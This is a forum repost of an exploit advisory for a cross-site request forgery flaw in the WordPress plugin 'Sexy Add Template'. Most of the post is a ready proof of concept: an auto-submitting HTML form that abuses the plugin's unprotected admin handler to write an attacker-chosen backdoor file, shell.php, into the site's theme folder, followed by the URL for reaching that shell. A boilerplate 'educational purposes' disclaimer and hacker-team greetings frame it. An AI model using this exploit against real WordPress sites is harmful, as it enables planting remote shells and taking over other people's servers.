StoNe- Posted February 15, 2013 Report Posted February 15, 2013 WordPress Sexy Add Template third party plugin suffers from a cross site request forgery vulnerability that can allow for a remote shell upload.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ||| Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability ||| xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ./Title Exploit : Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability ./Link Download : http://wordpress.org/extend/plugins/sexy-add-template/ ./Author Exploit: [ TheCyberNuxbie ] [ root@31337sec.com ] [ nux_exploit ] ./Security Risk : [ Critical Level ] ./Category XPL : [ WebApps/ZeroDay ] ./Tested On : Mozilla Firefox + Xampp + Windows 7 Ultimate x32 ID ./Time & Date : September, 22 2012. 10:27 AM. Jakarta, Indonesia. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ||| -=[ Use It At Your Risk ]=- ||| ||| This Was Written For Educational Purpos Only ||| ||| Author Will Be Not Responsible For Any Damage ||| xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ################################################################################# # # [ Information Details ] # - Wordpress Plugin Sexy Add Template: # Attacker allow CSRF Upload Shell. # http://localhost/wp-admin/themes.php?page=AM-sexy-handle <--- Vuln CSRF, not require verification CODE "wpnonce". # # <html> # <head> # <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> # <title>Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability</title> # </head> # <body onload="document.form0.submit();"> # <form method="POST" name="form0" action="http://localhost/wp-admin/themes.php?page=AM-sexy-handle" method="post" enctype="multipart/form-data" > # <input type="hidden" name="newfile" value="yes" /> # <input type="hidden" type="text" value="shell.php" name="AM_filename"> # <textarea type="hidden" name="AM_file_content"> # [ Your Script Backdoor/Shell ] # </textarea> # </form> # </body> # </html> # # - Access Shell: # http://localhost/wp-content/themes/[theme-name]/shell.php <--- HACKED...!!! # # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # # - Special Thanks: # ...:::' 1337day - Inj3ct0r TEAM ':::... # BoSs r0073r & All 31337 Member Inj3ct0r TEAM,,, # , And All Inj3ct0r Fans & All Hacktivist,,,Source: WordPress Sexy Add Template CSRF Shell Upload ? Packet Storm Quote